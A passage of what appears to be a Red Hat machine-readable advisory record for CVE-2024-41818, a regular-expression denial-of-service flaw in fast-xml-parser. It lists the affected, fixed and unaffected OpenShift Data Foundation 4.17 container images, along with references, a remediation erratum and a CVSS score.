"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2300499", }, ], notes: [ { category: "description", text: "A regular expression denial of service (ReDoS) flaw was found in fast-xml-parser in the currency.js script. By sending a specially crafted regex input, a remote attacker could cause a denial of service condition.", title: "Vulnerability description", }, { category: "summary", text: "fast-xml-parser: ReDOS at currency parsing in currency.js", title: "Vulnerability summary", }, { category: "other", text: "Red Hat has decided to rate this vulnerability as Important due to the potential loss of Availability and the low complexity.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-41818", }, { category: "external", summary: "RHBZ#2300499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300499", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-41818", url: "https://www.cve.org/CVERecord?id=CVE-2024-41818", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-41818", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-41818", }, { category: "external", summary: "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10", url: "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10", }, { category: "external", summary: "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164", url: "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164", }, { category: "external", summary: "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v", url: "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v", }, ], release_date: "2024-07-28T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", 